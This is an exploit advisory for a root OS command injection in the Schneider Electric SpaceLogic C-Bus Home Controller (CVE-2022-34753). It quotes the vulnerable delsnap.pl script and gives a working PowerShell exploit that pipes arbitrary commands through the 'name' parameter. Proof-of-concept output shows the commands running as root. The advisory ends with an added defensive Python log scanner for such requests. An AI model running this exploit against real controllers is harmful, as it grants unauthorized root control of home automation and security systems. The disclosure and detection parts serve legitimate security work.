Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) versions 1.31.460 and below suffer from an authenticated OS command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter of the delsnap.pl Perl/CGI script, which is used for deleting snapshots taken from the webcam.
<#SpaceLogic.ps1

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit


Vendor: Schneider Electric SE
Product web page: https://www.se.com
                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware

Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
                  formerly known as C-Bus Wiser Home Controller MK2
                  V1.31.460 and prior
                  Firmware: 604

Summary: SpaceLogic C-Bus Home Automation System
Lighting control and automation solutions for
buildings of the future, part of SpaceLogic.
SpaceLogic C-Bus is a powerful, fully integrated
system that can control and automate lighting
and many other electrical systems and products.
The SpaceLogic C-Bus system is robust, flexible,
scalable and has proven solutions for buildings
of the future. Implemented for commercial and
residential buildings automation, it brings
control, comfort, efficiency and ease of use
to its occupants.

Wiser Home Control makes technologies in your
home easy by providing seamless control of music,
home theatre, lighting, air conditioning, sprinkler
systems, curtains and shutters, security systems...
you name it. Usable anytime, anywhere even when
you are away, via preset shortcuts or direct
control, in the same look and feel from a wall
switch, a home computer, or even your smartphone
or TV - there is no wiser way to enjoy 24/7
connectivity, comfort and convenience, entertainment
and peace of mind homewide!

The Wiser 2 Home Controller allows you to access
your C-Bus using a graphical user interface, sometimes
referred to as the Wiser 2 UI. The Wiser 2 Home
Controller arrives with a sample project loaded
and the user interface accessible from your local
home network. With certain options set, you can
also access the Wiser 2 UI from anywhere using
the Internet. Using the Wiser 2 Home Controller
you can: control equipment such as IP cameras,
C-Bus devices and non C-Bus wired and wireless
equipment on the home LAN, schedule events in
the home, create and store scenes on-board, customise
a C-Bus system using the on-board Logic Engine,
monitor the home environment including C-Bus and
security systems, control ZigBee products such
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
Examples of equipment you might access with Wiser
2 Home Controller include lighting, HVAC, curtains,
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
multi-room audio and security controls.

Desc: The home automation solution suffers from
an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary
shell commands as the root user via the 'name' GET
parameter in 'delsnap.pl' Perl/CGI script which is
used for deleting snapshots taken from the webcam.

=========================================================
/www/delsnap.pl:
----------------

#!/usr/bin/perl
use IO::Handle;


select(STDERR);
$| = 1;
select(STDOUT);
$| = 1;

#print "\r\n\r\n";

$CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
use CGI;

my $PROGNAME = "delsnap.pl";

my $cgi = new CGI();

my $name = $cgi->param('name');
if ($name eq "list") {
    print "\r\n\r\n";
    print "DATA=";
    print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
    exit(0);
}
if ($name eq "deleteall") {
    print "\r\n\r\n";
    print "DELETINGALL=TRUE&";
    print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
    print "COMPLETED=true\n";
    exit(0);
}
#print "name $name\n";
print "\r\n\r\n";
my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";

unlink $filename or die "COMPLETED=false\n";

print "COMPLETED=true\n";

=========================================================

Tested on: Machine: OMAP3 Wiser2 Board
           CPU: ARMv7 revision 2
           GNU/Linux 2.6.37 (armv7l)
           BusyBox v1.22.1
           thttpd/2.25b
           Perl v5.20.0
           Clipsal 81
           Angstrom 2009.X-stable
           PICED 4.14.0.100
           lighttpd/1.7
           GCC 4.4.3
           NodeJS v10.15.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5710
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf

CVE ID: CVE-2022-34753
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753


27.03.2022

#>


$host.UI.RawUI.ForegroundColor = "Green"
if ($($args.Count) -ne 2) {
    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
} else {
    $ip = $args[0]
    $cmd = $args[1]
    $cmdinj = "/delsnap.pl?name=|$cmd"
    Write-Host("`nSending command '$cmd' to $ip`n")
    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
    curl -v $ip$cmdinj
}


<#PoC

PS C:\> .\SpaceLogic.ps1

Usage: .\SpaceLogic.ps1 [IP] [CMD]

PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"

Sending command 'uname -a;id;pwd' to 192.168.1.2

VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
VERBOSE: received 129-byte response of content type text/html; charset=utf-8


StatusCode        : 200
StatusDescription : OK
Content           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
                    uid=0(root) gid=0(root)
                    /custom-package

RawContent        : HTTP/1.1 200 OK
                    Access-Control-Allow-Origin: *
                    Connection: keep-alive
                    Content-Length: 129
                    Content-Type: text/html; charset=utf-8
                    Date: Thu, 30 Jun 2022 14:48:43 GMT
                    ETag: W/"81-LTIWJvYlDBYAlgXEy...
Forms             : {}
Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; charset=utf-8]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 129


PS C:\>

#>
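For detection, the request pattern described in the advisory can be hunted in web access logs. The following is an added example, not code from the advisory or from Schneider Electric: it flags delsnap.pl requests whose 'name' value is neither "list", "deleteall", nor a bare file name. The Common Log Format layout, the file-name allowlist and the sample log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Values delsnap.pl handles itself, per the script source in the advisory.
KEYWORDS = {"list", "deleteall"}
# Assumption: legitimate snapshot names are bare file names.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")
# Request field of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+"')
# Constructed sample log lines (documentation IP ranges, invented file name).
SAMPLE_LOG = [
    '192.0.2.10 - admin [30/Jun/2022:14:40:01 +0000] "GET /delsnap.pl?name=list HTTP/1.1" 200 64',
    '192.0.2.10 - admin [30/Jun/2022:14:41:12 +0000] "GET /delsnap.pl?name=snap_0001.jpg HTTP/1.1" 200 16',
    '198.51.100.7 - admin [30/Jun/2022:14:48:43 +0000] "GET /delsnap.pl?name=%7Cuname%20-a%3Bid%3Bpwd HTTP/1.1" 200 129',
    '198.51.100.7 - admin [30/Jun/2022:14:49:02 +0000] "GET /index.html HTTP/1.1" 200 512',
]


def classify_name(value):
    """Return None for an expected value, otherwise a short reason."""
    if value in KEYWORDS or SAFE_NAME.fullmatch(value):
        return None
    if "/" in value or "\\" in value or ".." in value:
        return "path component in name"
    return "unexpected character in name (possible shell metacharacter)"


def scan(lines):
    """Return (client, decoded name, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/delsnap.pl"):
            continue
        # parse_qs percent-decodes, so %7C and a literal | are treated alike.
        names = parse_qs(url.query, keep_blank_values=True).get("name", [])
        for value in names:
            reason = classify_name(value)
            if reason:
                hits.append((line.split(" ", 1)[0], value, reason))
    return hits


if __name__ == "__main__":
    for client, value, reason in scan(SAMPLE_LOG):
        print(f"{client}: name={value!r}: {reason}")
```

Tighten SAFE_NAME to the naming scheme the controller actually uses for snapshots once that is known; a hit on a device running firmware V1.31.460 or earlier warrants review of what ran as root at that timestamp.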